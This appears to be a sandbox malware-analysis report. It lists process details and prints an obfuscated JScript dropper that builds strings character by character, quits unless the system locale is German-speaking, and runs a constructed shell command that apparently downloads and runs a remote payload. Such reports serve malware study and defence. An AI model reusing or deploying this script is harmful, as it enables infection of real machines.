Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 14 |
Start time: | 03:07:35 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 15 |
Start time: | 03:07:35 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 16 |
Start time: | 03:07:35 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function ceryw() { |
|
1 | wqmxzx = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var mylrvx = this[tkhtouuec + fsjgei + iwfyief + yosdvk + japdc + ajecw + zrzmr + ulvfr] ( this[iiasscf + vlqlxl + jvrckujjh + iwfyief + ggakzubkx + tkhtouuec + ulvfr][jmwfu + iwfyief + japdc + fsjgei + ulvfr + japdc + apecon + wxowhe + nawhdn + japdc + jvrckujjh + ulvfr] ( iiasscf + vlqlxl + jvrckujjh + iwfyief + ggakzubkx + tkhtouuec + ulvfr + elpytvi + vlqlxl + cgslp + japdc + trfrkj + trfrkj ) [paqldv + japdc + fwsyh + paqldv + japdc + fsjgei + edrczqe] ( fqeqajh + kmgbcnjyc + gpkqaao + xmbwzvqxv + hfynnauxr + jmwfu + cqzcrrye + paqldv + paqldv + gpkqaao + yfllcdryw + vwjheq + hfynnauxr + cqzcrrye + vlqlxl + gpkqaao + paqldv + fqdktbz + jmwfu + emjtm + zrzmr + ulvfr + iwfyief + emjtm + trfrkj + qwbvvcc + bjwhneqy + fsjgei + zrzmr + japdc + trfrkj + fqdktbz + ajecw + zrzmr + ulvfr + japdc + iwfyief + zrzmr + fsjgei + ulvfr + ggakzubkx + emjtm + zrzmr + fsjgei + trfrkj + fqdktbz + byjmfdxsj + emjtm + jvrckujjh + fsjgei + trfrkj + japdc ), 16 ); |
|
3 | for ( vfwdbgzki = 0 ; vfwdbgzki < wqmxzx[trfrkj + japdc + zrzmr + fwsyh + ulvfr + cgslp] ; ++ vfwdbgzki ) | |
4 | { | |
5 | if ( mylrvx == wqmxzx[vfwdbgzki] ) | |
6 | { | |
7 | mylrvx = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( mylrvx !== true ) | |
12 | this[iiasscf + vlqlxl + jvrckujjh + iwfyief + ggakzubkx + tkhtouuec + ulvfr][svafgpfbs + wlxkwkxew + ggakzubkx + ulvfr] ( ); | |
13 | this[iiasscf + vlqlxl + jvrckujjh + iwfyief + ggakzubkx + tkhtouuec + ulvfr][jmwfu + iwfyief + japdc + fsjgei + ulvfr + japdc + apecon + wxowhe + nawhdn + japdc + jvrckujjh + ulvfr] ( iiasscf + vlqlxl + jvrckujjh + iwfyief + ggakzubkx + tkhtouuec + ulvfr + elpytvi + vlqlxl + cgslp + japdc + trfrkj + trfrkj ) [iwfyief + wlxkwkxew + zrzmr] ( jvrckujjh + zassygv + edrczqe + qwbvvcc + tmfsg + jvrckujjh + qwbvvcc + tkhtouuec + emjtm + lyicmw + japdc + iwfyief + yosdvk + cgslp + japdc + trfrkj + trfrkj + elpytvi + japdc + zehiferzx + japdc + qwbvvcc + syotgzo + jmwfu + emjtm + zassygv + zassygv + fsjgei + zrzmr + edrczqe + qwbvvcc + dnurqdzzh + ajecw + zrzmr + wwsfofcrh + emjtm + xfgsjufpe + japdc + syotgzo + iiasscf + japdc + wxowhe + paqldv + japdc + uqggnjyt + wlxkwkxew + japdc + yosdvk + ulvfr + qwbvvcc + syotgzo + apecon + wlxkwkxew + ulvfr + niunbrluz + ggakzubkx + trfrkj + japdc + qwbvvcc + uhitmjh + ulvfr + japdc + zassygv + tkhtouuec + uhitmjh + fqdktbz + ggakzubkx + zrzmr + wwsfofcrh + emjtm + ggakzubkx + jvrckujjh + japdc + elpytvi + tkhtouuec + edrczqe + nbxkku + qwbvvcc + cgslp + ulvfr + ulvfr + tkhtouuec + ozgjljpxy + tmfsg + tmfsg + uknsymy + emcqm + yxlps + elpytvi + uknsymy + jxzpjb + yxlps + elpytvi + uknsymy + elpytvi + okqbek + rlavd + abvwvdipn + tmfsg + ggakzubkx + zrzmr + wwsfofcrh + emjtm + ggakzubkx + jvrckujjh + japdc + elpytvi + tkhtouuec + cgslp + tkhtouuec + dnurqdzzh + jejasrgr + jejasrgr + yosdvk + ulvfr + fsjgei + iwfyief + ulvfr + qwbvvcc + uhitmjh + ulvfr + japdc + zassygv + tkhtouuec + uhitmjh + fqdktbz + ggakzubkx + zrzmr + wwsfofcrh + emjtm + ggakzubkx + jvrckujjh + japdc + elpytvi + tkhtouuec + edrczqe + nbxkku + jejasrgr + jejasrgr + jvrckujjh + zassygv + edrczqe + qwbvvcc + tmfsg + jvrckujjh + qwbvvcc + zrzmr + japdc + ulvfr + qwbvvcc + wlxkwkxew + yosdvk + japdc + qwbvvcc + fqdktbz + fqdktbz + uknsymy + emcqm + yxlps + elpytvi + uknsymy + jxzpjb + yxlps + elpytvi + uknsymy + elpytvi + okqbek + rlavd + abvwvdipn + rxfyg + cqxil + cqxil + cqxil + cqxil + fqdktbz + edrczqe + fsjgei + wwsfofcrh + lyicmw + lyicmw + lyicmw + iwfyief + emjtm + emjtm + ulvfr + fqdktbz + jejasrgr + jejasrgr + jvrckujjh + zassygv + edrczqe + qwbvvcc + tmfsg + jvrckujjh + qwbvvcc + iwfyief + japdc + fwsyh + yosdvk + wwsfofcrh + iwfyief + yxlps + okqbek + qwbvvcc + tmfsg + yosdvk + qwbvvcc + fqdktbz + fqdktbz + uknsymy + emcqm + yxlps + elpytvi + uknsymy + jxzpjb + yxlps + elpytvi + uknsymy + elpytvi + okqbek + rlavd + abvwvdipn + rxfyg + cqxil + cqxil + cqxil + cqxil + fqdktbz + edrczqe + fsjgei + wwsfofcrh + lyicmw + lyicmw + lyicmw + iwfyief + emjtm + emjtm + ulvfr + fqdktbz + okqbek + okqbek + uknsymy + okqbek + okqbek + yxlps + rujjw + txmgxpa + rujjw + uknsymy + yxlps + okqbek + okqbek + cqxil + elpytvi + edrczqe + trfrkj + trfrkj, 0, false ); |
|
14 | } | |
15 | rujjw = "W"; | |
16 | rujjw = "u"; | |
17 | rujjw = "a"; | |
18 | rujjw = "J"; | |
19 | rujjw = "x"; | |
20 | rujjw = "I"; | |
21 | rujjw = "V"; | |
22 | rujjw = "X"; | |
23 | rujjw = "O"; | |
24 | rujjw = "X"; | |
25 | rujjw = "E"; | |
26 | rujjw = "E"; | |
27 | rujjw = "B"; | |
28 | rujjw = "t"; | |
29 | rujjw = "Q"; | |
30 | rujjw = "U"; | |
31 | rujjw = "c"; | |
32 | rujjw = "V"; | |
33 | rujjw = "I"; | |
34 | rujjw = "k"; | |
35 | rujjw = "g"; | |
36 | rujjw = "K"; | |
37 | rujjw = "L"; | |
38 | rujjw = "q"; | |
39 | rujjw = "W"; | |
40 | rujjw = "M"; | |
41 | rujjw = "y"; | |
42 | rujjw = "p"; | |
43 | rujjw = "S"; | |
44 | rujjw = "6"; | |
45 | byjmfdxsj = "K"; | |
46 | byjmfdxsj = "h"; | |
47 | byjmfdxsj = "v"; | |
48 | byjmfdxsj = "q"; | |
49 | byjmfdxsj = "a"; | |
50 | byjmfdxsj = "g"; | |
51 | byjmfdxsj = "r"; | |
52 | byjmfdxsj = "w"; | |
53 | byjmfdxsj = "M"; | |
54 | byjmfdxsj = "i"; | |
55 | byjmfdxsj = "j"; | |
56 | byjmfdxsj = "Q"; | |
57 | byjmfdxsj = "u"; | |
58 | byjmfdxsj = "s"; | |
59 | byjmfdxsj = "q"; | |
60 | byjmfdxsj = "v"; | |
61 | byjmfdxsj = "F"; | |
62 | byjmfdxsj = "L"; | |
63 | cqzcrrye = "A"; | |
64 | cqzcrrye = "V"; | |
65 | cqzcrrye = "o"; | |
66 | cqzcrrye = "d"; | |
67 | cqzcrrye = "h"; | |
68 | cqzcrrye = "r"; | |
69 | cqzcrrye = "f"; | |
70 | cqzcrrye = "K"; | |
71 | cqzcrrye = "B"; | |
72 | cqzcrrye = "H"; | |
73 | cqzcrrye = "F"; | |
74 | cqzcrrye = "i"; | |
75 | cqzcrrye = "s"; | |
76 | cqzcrrye = "d"; | |
77 | cqzcrrye = "T"; | |
78 | cqzcrrye = "u"; | |
79 | cqzcrrye = "U"; | |
80 | cqzcrrye = "F"; | |
81 | cqzcrrye = "Q"; | |
82 | cqzcrrye = "S"; | |
83 | cqzcrrye = "l"; | |
84 | cqzcrrye = "d"; | |
85 | cqzcrrye = "O"; | |
86 | cqzcrrye = "t"; | |
87 | cqzcrrye = "S"; | |
88 | cqzcrrye = "Y"; | |
89 | cqzcrrye = "Q"; | |
90 | cqzcrrye = "j"; | |
91 | cqzcrrye = "A"; | |
92 | cqzcrrye = "z"; | |
93 | cqzcrrye = "V"; | |
94 | cqzcrrye = "m"; | |
95 | cqzcrrye = "U"; | |
96 | jxzpjb = "m"; | |
97 | jxzpjb = "W"; | |
98 | jxzpjb = "X"; | |
99 | jxzpjb = "x"; | |
100 | jxzpjb = "s"; | |
101 | jxzpjb = "I"; | |
102 | jxzpjb = "L"; | |
103 | jxzpjb = "Q"; | |
104 | jxzpjb = "B"; | |
105 | jxzpjb = "f"; | |
106 | jxzpjb = "T"; | |
107 | jxzpjb = "e"; | |
108 | jxzpjb = "A"; | |
109 | jxzpjb = "k"; | |
110 | jxzpjb = "O"; | |
111 | jxzpjb = "h"; | |
112 | jxzpjb = "S"; | |
113 | jxzpjb = "N"; | |
114 | jxzpjb = "o"; | |
115 | jxzpjb = "e"; | |
116 | jxzpjb = "y"; | |
117 | jxzpjb = "Z"; | |
118 | jxzpjb = "x"; | |
119 | jxzpjb = "f"; | |
120 | jxzpjb = "e"; | |
121 | jxzpjb = "J"; | |
122 | jxzpjb = "N"; | |
123 | jxzpjb = "R"; | |
124 | jxzpjb = "w"; | |
125 | jxzpjb = "h"; | |
126 | jxzpjb = "o"; | |
127 | jxzpjb = "o"; | |
128 | jxzpjb = "4"; | |
129 | abvwvdipn = "K"; | |
130 | abvwvdipn = "w"; | |
131 | abvwvdipn = "Y"; | |
132 | abvwvdipn = "W"; | |
133 | abvwvdipn = "V"; | |
134 | abvwvdipn = "P"; | |
135 | abvwvdipn = "S"; | |
136 | abvwvdipn = "R"; | |
137 | abvwvdipn = "J"; | |
138 | abvwvdipn = "C"; | |
139 | abvwvdipn = "p"; | |
140 | abvwvdipn = "m"; | |
141 | abvwvdipn = "h"; | |
142 | abvwvdipn = "t"; | |
143 | abvwvdipn = "o"; | |
144 | abvwvdipn = "B"; | |
145 | abvwvdipn = "t"; | |
146 | abvwvdipn = "L"; | |
147 | abvwvdipn = "Z"; | |
148 | abvwvdipn = "e"; | |
149 | abvwvdipn = "v"; | |
150 | abvwvdipn = "x"; | |
151 | abvwvdipn = "L"; | |
152 | abvwvdipn = "P"; | |
153 | abvwvdipn = "p"; | |
154 | abvwvdipn = "H"; | |
155 | abvwvdipn = "s"; | |
156 | abvwvdipn = "t"; | |
157 | abvwvdipn = "e"; | |
158 | abvwvdipn = "f"; | |
159 | abvwvdipn = "j"; | |
160 | abvwvdipn = "C"; | |
161 | abvwvdipn = "S"; | |
162 | abvwvdipn = "G"; | |
163 | abvwvdipn = "X"; | |
164 | abvwvdipn = "v"; | |
165 | abvwvdipn = "Q"; | |
166 | abvwvdipn = "k"; | |
167 | abvwvdipn = "n"; | |
168 | abvwvdipn = "f"; | |
169 | abvwvdipn = "a"; | |
170 | abvwvdipn = "g"; | |
171 | abvwvdipn = "m"; | |
172 | abvwvdipn = "5"; | |
173 | hfynnauxr = "Z"; | |
174 | hfynnauxr = "j"; | |
175 | hfynnauxr = "_"; | |
176 | cgslp = "M"; | |
177 | cgslp = "J"; | |
178 | cgslp = "Y"; | |
179 | cgslp = "H"; | |
180 | cgslp = "T"; | |
181 | cgslp = "T"; | |
182 | cgslp = "w"; | |
183 | cgslp = "W"; | |
184 | cgslp = "V"; | |
185 | cgslp = "q"; | |
186 | cgslp = "B"; | |
187 | cgslp = "i"; | |
188 | cgslp = "g"; | |
189 | cgslp = "F"; | |
190 | cgslp = "Y"; | |
191 | cgslp = "K"; | |
192 | cgslp = "Q"; | |
193 | cgslp = "N"; | |
194 | cgslp = "c"; | |
195 | cgslp = "h"; | |
196 | okqbek = "M"; | |
197 | okqbek = "T"; | |
198 | okqbek = "m"; | |
199 | okqbek = "g"; | |
200 | okqbek = "y"; | |
201 | okqbek = "o"; | |
202 | okqbek = "W"; | |
203 | okqbek = "k"; | |
204 | okqbek = "J"; | |
205 | okqbek = "Z"; | |
206 | okqbek = "k"; | |
207 | okqbek = "K"; | |
208 | okqbek = "n"; | |
209 | okqbek = "B"; | |
210 | okqbek = "g"; | |
211 | okqbek = "p"; | |
212 | okqbek = "X"; | |
213 | okqbek = "o"; | |
214 | okqbek = "W"; | |
215 | okqbek = "h"; | |
216 | okqbek = "t"; | |
217 | okqbek = "t"; | |
218 | okqbek = "I"; | |
219 | okqbek = "f"; | |
220 | okqbek = "N"; | |
221 | okqbek = "x"; | |
222 | okqbek = "V"; | |
223 | okqbek = "Z"; | |
224 | okqbek = "X"; | |
225 | okqbek = "X"; | |
226 | okqbek = "y"; | |
227 | okqbek = "N"; | |
228 | okqbek = "k"; | |
229 | okqbek = "I"; | |
230 | okqbek = "D"; | |
231 | okqbek = "e"; | |
232 | okqbek = "F"; | |
233 | okqbek = "F"; | |
234 | okqbek = "w"; | |
235 | okqbek = "2"; | |
236 | bjwhneqy = "D"; | |
237 | bjwhneqy = "b"; | |
238 | bjwhneqy = "i"; | |
239 | bjwhneqy = "b"; | |
240 | bjwhneqy = "E"; | |
241 | bjwhneqy = "J"; | |
242 | bjwhneqy = "P"; | |
243 | bjwhneqy = "i"; | |
244 | bjwhneqy = "k"; | |
245 | bjwhneqy = "L"; | |
246 | bjwhneqy = "I"; | |
247 | bjwhneqy = "c"; | |
248 | bjwhneqy = "g"; | |
249 | bjwhneqy = "U"; | |
250 | bjwhneqy = "i"; | |
251 | bjwhneqy = "r"; | |
252 | bjwhneqy = "A"; | |
253 | bjwhneqy = "L"; | |
254 | bjwhneqy = "h"; | |
255 | bjwhneqy = "m"; | |
256 | bjwhneqy = "c"; | |
257 | bjwhneqy = "z"; | |
258 | bjwhneqy = "w"; | |
259 | bjwhneqy = "I"; | |
260 | bjwhneqy = "A"; | |
261 | bjwhneqy = "F"; | |
262 | bjwhneqy = "A"; | |
263 | bjwhneqy = "P"; | |
264 | tkhtouuec = "E"; | |
265 | tkhtouuec = "f"; | |
266 | tkhtouuec = "b"; | |
267 | tkhtouuec = "D"; | |
268 | tkhtouuec = "x"; | |
269 | tkhtouuec = "V"; | |
270 | tkhtouuec = "I"; | |
271 | tkhtouuec = "A"; | |
272 | tkhtouuec = "b"; | |
273 | tkhtouuec = "i"; | |
274 | tkhtouuec = "d"; | |
275 | tkhtouuec = "S"; | |
276 | tkhtouuec = "l"; | |
277 | tkhtouuec = "C"; | |
278 | tkhtouuec = "M"; | |
279 | tkhtouuec = "M"; | |
280 | tkhtouuec = "G"; | |
281 | tkhtouuec = "p"; | |
282 | trfrkj = "h"; | |
283 | trfrkj = "j"; | |
284 | trfrkj = "I"; | |
285 | trfrkj = "k"; | |
286 | trfrkj = "e"; | |
287 | trfrkj = "X"; | |
288 | trfrkj = "Q"; | |
289 | trfrkj = "C"; | |
290 | trfrkj = "f"; | |
291 | trfrkj = "R"; | |
292 | trfrkj = "j"; | |
293 | trfrkj = "S"; | |
294 | trfrkj = "K"; | |
295 | trfrkj = "W"; | |
296 | trfrkj = "e"; | |
297 | trfrkj = "P"; | |
298 | trfrkj = "q"; | |
299 | trfrkj = "g"; | |
300 | trfrkj = "t"; | |
301 | trfrkj = "u"; | |
302 | trfrkj = "E"; | |
303 | trfrkj = "f"; | |
304 | trfrkj = "a"; | |
305 | trfrkj = "F"; | |
306 | trfrkj = "d"; | |
307 | trfrkj = "Q"; | |
308 | trfrkj = "K"; | |
309 | trfrkj = "A"; | |
310 | trfrkj = "t"; | |
311 | trfrkj = "O"; | |
312 | trfrkj = "m"; | |
313 | trfrkj = "B"; | |
314 | trfrkj = "l"; | |
315 | yfllcdryw = "S"; | |
316 | yfllcdryw = "B"; | |
317 | yfllcdryw = "y"; | |
318 | yfllcdryw = "p"; | |
319 | yfllcdryw = "z"; | |
320 | yfllcdryw = "S"; | |
321 | yfllcdryw = "W"; | |
322 | yfllcdryw = "g"; | |
323 | yfllcdryw = "d"; | |
324 | yfllcdryw = "X"; | |
325 | yfllcdryw = "K"; | |
326 | yfllcdryw = "B"; | |
327 | yfllcdryw = "s"; | |
328 | yfllcdryw = "X"; | |
329 | yfllcdryw = "D"; | |
330 | yfllcdryw = "B"; | |
331 | yfllcdryw = "Y"; | |
332 | yfllcdryw = "A"; | |
333 | yfllcdryw = "g"; | |
334 | yfllcdryw = "u"; | |
335 | yfllcdryw = "P"; | |
336 | yfllcdryw = "E"; | |
337 | yfllcdryw = "f"; | |
338 | yfllcdryw = "M"; | |
339 | yfllcdryw = "J"; | |
340 | yfllcdryw = "T"; | |
341 | yfllcdryw = "Y"; | |
342 | yfllcdryw = "B"; | |
343 | yfllcdryw = "A"; | |
344 | yfllcdryw = "q"; | |
345 | yfllcdryw = "Q"; | |
346 | yfllcdryw = "v"; | |
347 | yfllcdryw = "y"; | |
348 | yfllcdryw = "A"; | |
349 | yfllcdryw = "x"; | |
350 | yfllcdryw = "K"; | |
351 | yfllcdryw = "T"; | |
352 | yfllcdryw = "R"; | |
353 | yfllcdryw = "x"; | |
354 | yfllcdryw = "E"; | |
355 | yfllcdryw = "B"; | |
356 | yfllcdryw = "O"; | |
357 | yfllcdryw = "Z"; | |
358 | yfllcdryw = "N"; | |
359 | tmfsg = "h"; | |
360 | tmfsg = "H"; | |
361 | tmfsg = "Y"; | |
362 | tmfsg = "Z"; | |
363 | tmfsg = "m"; | |
364 | tmfsg = "K"; | |
365 | tmfsg = "h"; | |
366 | tmfsg = "G"; | |
367 | tmfsg = "S"; | |
368 | tmfsg = "U"; | |
369 | tmfsg = "K"; | |
370 | tmfsg = "A"; | |
371 | tmfsg = "B"; | |
372 | tmfsg = "n"; | |
373 | tmfsg = "B"; | |
374 | tmfsg = "G"; | |
375 | tmfsg = "q"; | |
376 | tmfsg = "x"; | |
377 | tmfsg = "U"; | |
378 | tmfsg = "O"; | |
379 | tmfsg = "l"; | |
380 | tmfsg = "P"; | |
381 | tmfsg = "d"; | |
382 | tmfsg = "y"; | |
383 | tmfsg = "V"; | |
384 | tmfsg = "F"; | |
385 | tmfsg = "g"; | |
386 | tmfsg = "R"; | |
387 | tmfsg = "w"; | |
388 | tmfsg = "n"; | |
389 | tmfsg = "b"; | |
390 | tmfsg = "r"; | |
391 | tmfsg = "U"; | |
392 | tmfsg = "O"; | |
393 | tmfsg = "/"; | |
394 | dnurqdzzh = "L"; | |
395 | dnurqdzzh = "x"; | |
396 | dnurqdzzh = "U"; | |
397 | dnurqdzzh = "T"; | |
398 | dnurqdzzh = "e"; | |
399 | dnurqdzzh = "W"; | |
400 | dnurqdzzh = "J"; | |
401 | dnurqdzzh = "\""; | |
402 | fsjgei = "h"; | |
403 | fsjgei = "T"; | |
404 | fsjgei = "U"; | |
405 | fsjgei = "w"; | |
406 | fsjgei = "m"; | |
407 | fsjgei = "x"; | |
408 | fsjgei = "a"; | |
409 | fsjgei = "Z"; | |
410 | fsjgei = "R"; | |
411 | fsjgei = "x"; | |
412 | fsjgei = "q"; | |
413 | fsjgei = "B"; | |
414 | fsjgei = "X"; | |
415 | fsjgei = "N"; | |
416 | fsjgei = "N"; | |
417 | fsjgei = "a"; | |
418 | edrczqe = "D"; | |
419 | edrczqe = "q"; | |
420 | edrczqe = "h"; | |
421 | edrczqe = "q"; | |
422 | edrczqe = "H"; | |
423 | edrczqe = "O"; | |
424 | edrczqe = "k"; | |
425 | edrczqe = "P"; | |
426 | edrczqe = "E"; | |
427 | edrczqe = "d"; | |
428 | zrzmr = "f"; | |
429 | zrzmr = "P"; | |
430 | zrzmr = "L"; | |
431 | zrzmr = "Y"; | |
432 | zrzmr = "o"; | |
433 | zrzmr = "M"; | |
434 | zrzmr = "O"; | |
435 | zrzmr = "E"; | |
436 | zrzmr = "a"; | |
437 | zrzmr = "S"; | |
438 | zrzmr = "x"; | |
439 | zrzmr = "P"; | |
440 | zrzmr = "u"; | |
441 | zrzmr = "F"; | |
442 | zrzmr = "S"; | |
443 | zrzmr = "Z"; | |
444 | zrzmr = "W"; | |
445 | zrzmr = "x"; | |
446 | zrzmr = "e"; | |
447 | zrzmr = "J"; | |
448 | zrzmr = "r"; | |
449 | zrzmr = "t"; | |
450 | zrzmr = "f"; | |
451 | zrzmr = "M"; | |
452 | zrzmr = "n"; | |
453 | zrzmr = "Z"; | |
454 | zrzmr = "l"; | |
455 | zrzmr = "E"; | |
456 | zrzmr = "E"; | |
457 | zrzmr = "n"; | |
458 | ozgjljpxy = "m"; | |
459 | ozgjljpxy = "u"; | |
460 | ozgjljpxy = "U"; | |
461 | ozgjljpxy = "P"; | |
462 | ozgjljpxy = "O"; | |
463 | ozgjljpxy = "h"; | |
464 | ozgjljpxy = "n"; | |
465 | ozgjljpxy = "U"; | |
466 | ozgjljpxy = "W"; | |
467 | ozgjljpxy = "t"; | |
468 | ozgjljpxy = "q"; | |
469 | ozgjljpxy = "Z"; | |
470 | ozgjljpxy = "O"; | |
471 | ozgjljpxy = "B"; | |
472 | ozgjljpxy = "n"; | |
473 | ozgjljpxy = "x"; | |
474 | ozgjljpxy = "Z"; | |
475 | ozgjljpxy = "u"; | |
476 | ozgjljpxy = "p"; | |
477 | ozgjljpxy = "U"; | |
478 | ozgjljpxy = "Z"; | |
479 | ozgjljpxy = "m"; | |
480 | ozgjljpxy = "H"; | |
481 | ozgjljpxy = "c"; | |
482 | ozgjljpxy = "C"; | |
483 | ozgjljpxy = "U"; | |
484 | ozgjljpxy = "C"; | |
485 | ozgjljpxy = "Z"; | |
486 | ozgjljpxy = "Y"; | |
487 | ozgjljpxy = "G"; | |
488 | ozgjljpxy = "r"; | |
489 | ozgjljpxy = "X"; | |
490 | ozgjljpxy = "H"; | |
491 | ozgjljpxy = "R"; | |
492 | ozgjljpxy = "X"; | |
493 | ozgjljpxy = ":"; | |
494 | wxowhe = "n"; | |
495 | wxowhe = "q"; | |
496 | wxowhe = "l"; | |
497 | wxowhe = "W"; | |
498 | wxowhe = "l"; | |
499 | wxowhe = "Z"; | |
500 | wxowhe = "N"; | |
501 | wxowhe = "r"; | |
502 | wxowhe = "P"; | |
503 | wxowhe = "T"; | |
504 | wxowhe = "V"; | |
505 | wxowhe = "f"; | |
506 | wxowhe = "s"; | |
507 | wxowhe = "T"; | |
508 | wxowhe = "e"; | |
509 | wxowhe = "s"; | |
510 | wxowhe = "m"; | |
511 | wxowhe = "e"; | |
512 | wxowhe = "J"; | |
513 | wxowhe = "Y"; | |
514 | wxowhe = "n"; | |
515 | wxowhe = "I"; | |
516 | wxowhe = "x"; | |
517 | wxowhe = "h"; | |
518 | wxowhe = "b"; | |
519 | elpytvi = "S"; | |
520 | elpytvi = "d"; | |
521 | elpytvi = "l"; | |
522 | elpytvi = "Y"; | |
523 | elpytvi = "P"; | |
524 | elpytvi = "U"; | |
525 | elpytvi = "k"; | |
526 | elpytvi = "a"; | |
527 | elpytvi = "n"; | |
528 | elpytvi = "d"; | |
529 | elpytvi = "G"; | |
530 | elpytvi = "d"; | |
531 | elpytvi = "D"; | |
532 | elpytvi = "y"; | |
533 | elpytvi = "p"; | |
534 | elpytvi = "I"; | |
535 | elpytvi = "d"; | |
536 | elpytvi = "E"; | |
537 | elpytvi = "m"; | |
538 | elpytvi = "P"; | |
539 | elpytvi = "Y"; | |
540 | elpytvi = "u"; | |
541 | elpytvi = "g"; | |
542 | elpytvi = "C"; | |
543 | elpytvi = "J"; | |
544 | elpytvi = "b"; | |
545 | elpytvi = "a"; | |
546 | elpytvi = "k"; | |
547 | elpytvi = "L"; | |
548 | elpytvi = "."; | |
549 | uknsymy = "g"; | |
550 | uknsymy = "U"; | |
551 | uknsymy = "l"; | |
552 | uknsymy = "s"; | |
553 | uknsymy = "Z"; | |
554 | uknsymy = "H"; | |
555 | uknsymy = "Q"; | |
556 | uknsymy = "z"; | |
557 | uknsymy = "c"; | |
558 | uknsymy = "U"; | |
559 | uknsymy = "t"; | |
560 | uknsymy = "Y"; | |
561 | uknsymy = "H"; | |
562 | uknsymy = "E"; | |
563 | uknsymy = "f"; | |
564 | uknsymy = "Y"; | |
565 | uknsymy = "a"; | |
566 | uknsymy = "b"; | |
567 | uknsymy = "T"; | |
568 | uknsymy = "1"; | |
569 | gpkqaao = "j"; | |
570 | gpkqaao = "P"; | |
571 | gpkqaao = "H"; | |
572 | gpkqaao = "y"; | |
573 | gpkqaao = "w"; | |
574 | gpkqaao = "F"; | |
575 | gpkqaao = "Q"; | |
576 | gpkqaao = "N"; | |
577 | gpkqaao = "p"; | |
578 | gpkqaao = "T"; | |
579 | gpkqaao = "P"; | |
580 | gpkqaao = "k"; | |
581 | gpkqaao = "e"; | |
582 | gpkqaao = "b"; | |
583 | gpkqaao = "z"; | |
584 | gpkqaao = "E"; | |
585 | uhitmjh = "K"; | |
586 | uhitmjh = "p"; | |
587 | uhitmjh = "G"; | |
588 | uhitmjh = "X"; | |
589 | uhitmjh = "C"; | |
590 | uhitmjh = "X"; | |
591 | uhitmjh = "r"; | |
592 | uhitmjh = "X"; | |
593 | uhitmjh = "e"; | |
594 | uhitmjh = "l"; | |
595 | uhitmjh = "N"; | |
596 | uhitmjh = "a"; | |
597 | uhitmjh = "%"; | |
598 | fqdktbz = "Y"; | |
599 | fqdktbz = "h"; | |
600 | fqdktbz = "u"; | |
601 | fqdktbz = "L"; | |
602 | fqdktbz = "n"; | |
603 | fqdktbz = "k"; | |
604 | fqdktbz = "W"; | |
605 | fqdktbz = "Q"; | |
606 | fqdktbz = "z"; | |
607 | fqdktbz = "d"; | |
608 | fqdktbz = "d"; | |
609 | fqdktbz = "L"; | |
610 | fqdktbz = "T"; | |
611 | fqdktbz = "o"; | |
612 | fqdktbz = "G"; | |
613 | fqdktbz = "y"; | |
614 | fqdktbz = "q"; | |
615 | fqdktbz = "P"; | |
616 | fqdktbz = "l"; | |
617 | fqdktbz = "I"; | |
618 | fqdktbz = "J"; | |
619 | fqdktbz = "V"; | |
620 | fqdktbz = "q"; | |
621 | fqdktbz = "M"; | |
622 | fqdktbz = "J"; | |
623 | fqdktbz = "K"; | |
624 | fqdktbz = "b"; | |
625 | fqdktbz = "w"; | |
626 | fqdktbz = "s"; | |
627 | fqdktbz = "X"; | |
628 | fqdktbz = "O"; | |
629 | fqdktbz = "E"; | |
630 | fqdktbz = "c"; | |
631 | fqdktbz = "d"; | |
632 | fqdktbz = "Q"; | |
633 | fqdktbz = "H"; | |
634 | fqdktbz = "a"; | |
635 | fqdktbz = "V"; | |
636 | fqdktbz = "X"; | |
637 | fqdktbz = "o"; | |
638 | fqdktbz = "X"; | |
639 | fqdktbz = "P"; | |
640 | fqdktbz = "U"; | |
641 | fqdktbz = "\\"; | |
642 | kmgbcnjyc = "C"; | |
643 | kmgbcnjyc = "w"; | |
644 | kmgbcnjyc = "J"; | |
645 | kmgbcnjyc = "m"; | |
646 | kmgbcnjyc = "t"; | |
647 | kmgbcnjyc = "h"; | |
648 | kmgbcnjyc = "V"; | |
649 | kmgbcnjyc = "G"; | |
650 | kmgbcnjyc = "Y"; | |
651 | kmgbcnjyc = "Q"; | |
652 | kmgbcnjyc = "K"; | |
653 | emjtm = "y"; | |
654 | emjtm = "U"; | |
655 | emjtm = "n"; | |
656 | emjtm = "c"; | |
657 | emjtm = "p"; | |
658 | emjtm = "Q"; | |
659 | emjtm = "L"; | |
660 | emjtm = "x"; | |
661 | emjtm = "G"; | |
662 | emjtm = "v"; | |
663 | emjtm = "M"; | |
664 | emjtm = "G"; | |
665 | emjtm = "o"; | |
666 | lyicmw = "a"; | |
667 | lyicmw = "m"; | |
668 | lyicmw = "k"; | |
669 | lyicmw = "G"; | |
670 | lyicmw = "u"; | |
671 | lyicmw = "c"; | |
672 | lyicmw = "E"; | |
673 | lyicmw = "v"; | |
674 | lyicmw = "K"; | |
675 | lyicmw = "b"; | |
676 | lyicmw = "v"; | |
677 | lyicmw = "e"; | |
678 | lyicmw = "f"; | |
679 | lyicmw = "s"; | |
680 | lyicmw = "E"; | |
681 | lyicmw = "L"; | |
682 | lyicmw = "f"; | |
683 | lyicmw = "M"; | |
684 | lyicmw = "W"; | |
685 | lyicmw = "Z"; | |
